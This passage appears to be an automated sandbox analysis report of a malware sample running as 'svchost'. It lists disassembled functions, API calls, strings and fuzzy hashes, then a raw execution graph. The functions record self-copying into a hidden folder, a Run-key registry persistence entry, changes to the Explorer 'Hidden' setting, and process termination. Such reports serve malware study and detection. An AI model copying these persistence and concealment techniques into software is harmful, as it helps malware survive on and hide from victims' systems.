                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6212F36A2CA8681EB70DB12E84C36B6365FBE4B54FB04231E56D865A8DF3DD449E700
                                                                                                                                                                                                                        Function 00007FF67E6D2EA8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction ID: 98d7949b6f3c2971b7babc64c9b133a7be90a8ec6960efcb6b28506391359325
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1901C42B92CA8282DB20DB51E85822A6371FBE9F45FB10531F58EC6664CF3DD54C9600
                                                                                                                                                                                                                        Function 00007FF67E6D3CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction ID: e6dfe4cacbe149102d00bf9f26a8d60c534c5b33d28419765d4e750b9301cb29
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E31B87661CAC485DB70DB15E8987ABB3A0FB98B40F604125EA8DC7B68DF3CD554DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3750
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3710: wsprintfW.USER32 ref: 00007FF67E6D386E
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3901
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3911
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3924
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3939
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3961
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF67E6D3A85
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF67E6D3A90
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF67E6D3AA9
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF67E6D3AC1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 8fc5e4f65130b16eaa3928a254402fc2ad815a5c563352bead05dd22f62a6eee
                                                                                                                                                                                                                        • Instruction ID: 9464edfcd0e30d9e2df2630e83776886e827229137068e193f742c9cf0d16383
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fc5e4f65130b16eaa3928a254402fc2ad815a5c563352bead05dd22f62a6eee
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19014466B2898692EF60DB24E8543AB5360FBA4744FF05432E64DC75A4EE3CD20EDB40
                                                                                                                                                                                                                        Function 00007FF67E6D3B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction ID: 1bedb1c90cff2c3b858d0ffe11b8f813ead35947111fd6509ba5b21af790d0d3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0501DB7A628A8086DB50CB15E44471BB764F798794FA01225FA8D43B68DF7DC149CB00
                                                                                                                                                                                                                        Function 00007FF67E6D13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 55ca7b25fc3fba999383f4887996ef625d541d6321faecf34a0365509225a8ea
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5012C6792C606C6EA30CF21E44432B63A0FB94349FF04135E68D82A98CF7CD54DDB00
                                                                                                                                                                                                                        Function 00007FF67E6D3980 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction ID: 3d156d199cf1ea1eee71aa391be41ad55ee4677e2a5a28ccacb96c107daa2ee3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0911F43A628A8096DB90CB15F44466B77A0F7947A0F606231F95E83BE8DF7CD148DB00
                                                                                                                                                                                                                        Function 00007FF67E6D1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 982e9fddf5a000c0859b0064548dcdacc803ba8c57b988cad7921cd91eae76fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE0122A928A87C2DE20EF61F84436A63A0FB94744FF00131F58D82A68DF7CD54DDB00
                                                                                                                                                                                                                        Function 00007FF67E6D2F38 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3901
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3911
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3924
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3939
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3961
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4530: CreateFileW.KERNELBASE ref: 00007FF67E6D4577
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF67E6D2FD3
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF67E6D2FE6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: e29fd03586ef6e4edaf0c29d4ef7ee6f451215793e0d91603cf34146f15c0c19
                                                                                                                                                                                                                        • Instruction ID: c5c8a7475562e04ed72f46f83d32f49b58fd66c1a46157c7e64237d74a24b5d6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e29fd03586ef6e4edaf0c29d4ef7ee6f451215793e0d91603cf34146f15c0c19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA11DA6AA38A8281EB60DB11F8583AB63A0FBA4B04FF04135E54DCA665DF7CE44D9740

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:8.5%
                                                                                                                                                                                                                        Total number of Nodes:352
                                                                                                                                                                                                                        Total number of Limit Nodes:23
                                                                                                                                                                                                                        execution_graph 108303 df0d790 108304 df0d7ac __security_init_cookie 108303->108304 108309 df0d83c 108304->108309 108311 df0d806 108304->108311 108315 df0d638 40 API calls 16 library calls 108304->108315 108307 df0d883 108307->108311 108326 df0d638 40 API calls 16 library calls 108307->108326 108308 df0d85a 108308->108307 108310 df0b480 _DllMainCRTStartup 97 API calls 108308->108310 108309->108311 108316 df0b480 108309->108316 108313 df0d876 108310->108313 108325 df0d638 40 API calls 16 library calls 108313->108325 108315->108309 108318 df0b488 108316->108318 108319 df0b4a0 _DllMainCRTStartup 108316->108319 108317 df0b4ac 108317->108308 108318->108317 108355 def5340 GetProcAddress GetProcAddress _DllMainCRTStartup 108318->108355 108356 def8bd0 4 API calls 2 library calls 108319->108356 108322 df0b491 108327 df0b2c0 108322->108327 108325->108307 108326->108311 108357 df04f30 108327->108357 108330 df0b36d _DllMainCRTStartup 108331 df0b38b _DllMainCRTStartup 108330->108331 108361 df0a010 41 API calls _DllMainCRTStartup 108330->108361 108334 df0b3ab _DllMainCRTStartup 108331->108334 108335 df0b39f _DllMainCRTStartup 108331->108335 108333 df0b314 _DllMainCRTStartup 108333->108330 108359 def1c60 5 API calls 2 library calls 108333->108359 108340 df0b3bf _DllMainCRTStartup 108334->108340 108341 df0b3ce _DllMainCRTStartup 108334->108341 108362 df09730 83 API calls 2 library calls 108335->108362 108338 df0b368 108360 df05580 29 API calls _DllMainCRTStartup 108338->108360 108363 df09730 83 API calls 2 library calls 108340->108363 108343 df0b3f1 _DllMainCRTStartup 108341->108343 108344 df0b3e2 _DllMainCRTStartup 108341->108344 108346 df0b414 _DllMainCRTStartup 108343->108346 108347 df0b405 _DllMainCRTStartup 108343->108347 108364 df09730 83 API calls 2 library calls 108344->108364 108349 df0b428 _DllMainCRTStartup 108346->108349 108350 df0b439 _DllMainCRTStartup 108346->108350 108365 df09730 83 API calls 2 library calls 108347->108365 108366 df09730 83 API calls 2 library calls 108349->108366 108367 df0cbb0 IsProcessorFeaturePresent RtlLookupFunctionEntry __crtCapturePreviousContext 108350->108367 108353 df0b437 108353->108350 108354 df0b46c 108354->108308 108355->108322 108356->108317 108358 df04f3c GetModuleFileNameA 108357->108358 108358->108333 108359->108338 108362->108334 108363->108341 108364->108343 108365->108346 108366->108353 108367->108354 108368 b0a8900 108380 b0a8610 108368->108380 108370 b0a89ab _DllMainCRTStartup 108388 b0bcbb0 108370->108388 108371 b0a892a _DllMainCRTStartup 108371->108370 108385 b0a8e10 IsProcessorFeaturePresent RtlLookupFunctionEntry _wsetlocale_nolock _DllMainCRTStartup 108371->108385 108373 b0a8a82 108375 b0a8992 108376 b0a8a45 108375->108376 108378 b0a899a _DllMainCRTStartup 108375->108378 108387 b0a7840 VirtualFree VirtualFree 108376->108387 108378->108370 108386 b0a7840 VirtualFree VirtualFree 108378->108386 108381 b0a862d Sleep 108380->108381 108382 b0a8651 108380->108382 108381->108382 108382->108371 108385->108375 108386->108370 108387->108370 108389 b0bcbb9 108388->108389 108390 b0bcbc4 108389->108390 108391 b0bcd54 IsProcessorFeaturePresent 108389->108391 108390->108373 108392 b0bcd6b 108391->108392 108395 b0c23dc RtlLookupFunctionEntry __crtCapturePreviousContext 108392->108395 108394 b0bcd7e 108394->108373 108395->108394 108396 b0a17f0 108443 b0a2650 108396->108443 108398 b0a1865 108399 b0a2650 27 API calls 108398->108399 108400 b0a1870 108399->108400 108449 b0bc2ac 108400->108449 108403 b0a1891 lstrcpyA 108404 b0a189d _ld12tod _DllMainCRTStartup 108403->108404 108405 b0a18f7 PathFileExistsA lstrcmpiA 108404->108405 108406 b0a192a lstrcmpiA 108405->108406 108407 b0a19a2 _DllMainCRTStartup 108405->108407 108406->108407 108408 b0a193e lstrcmpiA 108406->108408 108411 b0a19c0 lstrcmpiA 108407->108411 108408->108407 108409 b0a1952 lstrcmpiA 108408->108409 108409->108407 108410 b0a1966 lstrcmpiA 108409->108410 108410->108407 108412 b0a197a lstrcmpiA 108410->108412 108413 b0a19d4 108411->108413 108412->108407 108416 b0a198e lstrcmpiA 108412->108416 108414 b0a19e3 PathFindFileNameW 108413->108414 108415 b0a1a09 _DllMainCRTStartup 108413->108415 108414->108415 108464 b0a2710 108415->108464 108416->108407 108416->108411 108418 b0a1c0c 108471 b0bc26c 27 API calls 4 library calls 108418->108471 108419 b0a1a21 108419->108418 108421 b0a1a94 108419->108421 108423 b0a1ab5 _ld12tod 108421->108423 108469 b0a17a0 GetNativeSystemInfo _DllMainCRTStartup 108421->108469 108422 b0a1c14 108472 b0bc26c 27 API calls 4 library calls 108422->108472 108426 b0a1ae8 wsprintfA CreateFileA 108423->108426 108435 b0a1b55 _NMSG_WRITE 108426->108435 108427 b0a1c1c 108473 b0bc26c 27 API calls 4 library calls 108427->108473 108428 b0a1aa3 108430 b0a1ac2 TerminateProcess 108428->108430 108431 b0a1aa7 108428->108431 108430->108423 108470 b0a1370 30 API calls 6 library calls 108431->108470 108433 b0a1c24 108474 b0bc26c 27 API calls 4 library calls 108433->108474 108437 b0a1b7b lstrlenA 108435->108437 108438 b0a1be8 __termconin _NMSG_WRITE 108435->108438 108436 b0a1c2d 108439 b0bcbb0 _wsetlocale_nolock 2 API calls 108436->108439 108440 b0a1ba4 _NMSG_WRITE 108437->108440 108438->108418 108441 b0a1c3f 108439->108441 108442 b0a1bbf lstrlenA 108440->108442 108442->108438 108444 b0a265e 108443->108444 108445 b0a2666 _wcstombs_l_helper 108443->108445 108444->108398 108446 b0a269f 108445->108446 108447 b0bc2ac malloc 27 API calls 108445->108447 108446->108398 108448 b0a26c0 _wcstombs_l_helper 108447->108448 108448->108398 108450 b0bc340 108449->108450 108455 b0bc2c4 _calloc_impl 108449->108455 108481 b0bde38 DecodePointer 108450->108481 108452 b0bc345 108482 b0bfba8 27 API calls _getptd_noexit 108452->108482 108457 b0bc325 108455->108457 108461 b0bc32a 108455->108461 108463 b0a187d PathFindFileNameA 108455->108463 108475 b0bd8f0 27 API calls 2 library calls 108455->108475 108476 b0bd964 27 API calls 5 library calls 108455->108476 108477 b0bdeb8 GetProcAddress __crtCorExitProcess doexit 108455->108477 108478 b0bde38 DecodePointer 108455->108478 108479 b0bfba8 27 API calls _getptd_noexit 108457->108479 108480 b0bfba8 27 API calls _getptd_noexit 108461->108480 108463->108403 108463->108404 108465 b0a2724 __crtGetStringTypeA_stat 108464->108465 108468 b0a276b __crtGetStringTypeA_stat 108464->108468 108466 b0a274c 108465->108466 108467 b0bc2ac malloc 27 API calls 108465->108467 108466->108419 108467->108468 108468->108419 108469->108428 108470->108423 108471->108422 108472->108427 108473->108433 108474->108436 108475->108455 108476->108455 108478->108455 108479->108461 108480->108463 108481->108452 108482->108463 108483 b0a8850 108488 b0a8660 108483->108488 108485 b0a88d3 108486 b0a887c __termconin _DllMainCRTStartup 108486->108485 108494 b0a8c50 IsProcessorFeaturePresent RtlLookupFunctionEntry _wsetlocale_nolock _DllMainCRTStartup 108486->108494 108493 b0a8686 __security_init_cookie _calloc_impl realloc _DllMainCRTStartup 108488->108493 108489 b0a875d __termconin 108490 b0bcbb0 _wsetlocale_nolock 2 API calls 108489->108490 108491 b0a8773 108490->108491 108491->108486 108492 b0a8740 Thread32Next 108492->108489 108492->108493 108493->108489 108493->108492 108494->108486 108495 b0bd790 108498 b0bd7ac __security_init_cookie 108495->108498 108496 b0bd83c 108505 b0bd806 108496->108505 108508 b0bb480 108496->108508 108498->108496 108498->108505 108507 b0bd638 40 API calls 16 library calls 108498->108507 108499 b0bd85a 108500 b0bd883 108499->108500 108502 